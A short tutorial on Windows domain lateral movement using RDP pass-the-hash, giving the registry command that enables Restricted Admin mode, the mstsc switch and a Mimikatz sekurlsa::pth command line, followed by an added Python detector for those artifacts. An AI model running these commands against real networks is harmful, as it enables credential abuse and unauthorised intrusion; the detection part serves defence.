Domain lateral movement: RDP pass-the-hash

2022-05-15 07:42:15 Low risk performing artist

Domain lateral movement: RDP pass-the-hash with Mimikatz
Besides the IPC, WMI and SMB connections described above, a plaintext password or NTLM hash obtained earlier can also be used to connect over the RDP protocol.
Note: RDP is the Windows counterpart of SSH on Linux, a remote connection protocol; it is the one usually referred to by its port, 3389.

RDP connection with a plaintext password:
mstsc.exe /console /v: /admin
RDP connection with a password hash:
The Windows server must have Restricted Admin mode enabled. It is available by default on Windows 8.1 and Windows Server 2012 R2, and Windows 7 and Windows Server 2008 R2 also support it once patches 2871997/2973351 are installed. Enable it with the following command (DisableRestrictedAdmin set to 0 turns the mode on):
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
Then start the client with:
mstsc.exe /restrictedadmin

sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208sdlfkjssdlfksj "/run:mstsc.exe /restrictedadmin"
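From the defender's side, the two host artifacts this technique leaves behind are the registry change that enables Restricted Admin mode and an mstsc.exe launch with /restrictedadmin. The following is an added example, not code from the original post, that flags both in constructed Sysmon-style event lines; the pipe-delimited key=value layout, the sample events and the rule names are assumptions made for this example.

```python
import re

# Constructed sample events (not real telemetry). The pipe-delimited
# key=value layout is an assumption for this example; the field names mirror
# Sysmon's registry value set (ID 13) and process creation (ID 1) records.
SAMPLE_EVENTS = [
    "EventID=13|Image=C:\\Windows\\System32\\reg.exe"
    "|TargetObject=HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"
    "|Details=DWORD (0x00000000)",
    "EventID=13|Image=C:\\Windows\\System32\\svchost.exe"
    "|TargetObject=HKLM\\System\\CurrentControlSet\\Control\\Lsa\\LmCompatibilityLevel"
    "|Details=DWORD (0x00000005)",
    "EventID=1|Image=C:\\Windows\\System32\\mstsc.exe"
    "|CommandLine=mstsc.exe /restrictedadmin",
    "EventID=1|Image=C:\\Windows\\System32\\mstsc.exe"
    "|CommandLine=mstsc.exe /v:fileserver01",
]

# Lower-cased suffix of the value the page's REG ADD command writes
LSA_KEY = "\\control\\lsa\\disablerestrictedadmin"


def parse_event(line):
    """Split 'k=v|k=v' into a dict; values keep everything after the first '='."""
    return dict(field.split("=", 1) for field in line.split("|"))


def dword_value(details):
    """Extract the integer from Sysmon-style 'DWORD (0x00000000)' text, else None."""
    m = re.search(r"0x([0-9a-fA-F]+)", details)
    return int(m.group(1), 16) if m else None


def detect(lines):
    """Return (rule, image) hits for the two Restricted Admin indicators."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") == "13":
            target = ev.get("TargetObject", "").lower()
            # DisableRestrictedAdmin = 0 turns the mode ON (the name is a negation)
            if target.endswith(LSA_KEY) and dword_value(ev.get("Details", "")) == 0:
                hits.append(("restricted_admin_enabled_via_registry", ev.get("Image")))
        elif ev.get("EventID") == "1":
            if "/restrictedadmin" in ev.get("CommandLine", "").lower():
                hits.append(("mstsc_restricted_admin_launch", ev.get("Image")))
    return hits


if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

The registry rule fires on a configuration change that administrators may also make deliberately, since Restricted Admin mode keeps credentials off the remote host at the price of accepting hash-based RDP logons, so correlate hits with change records rather than treating each one as an incident.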

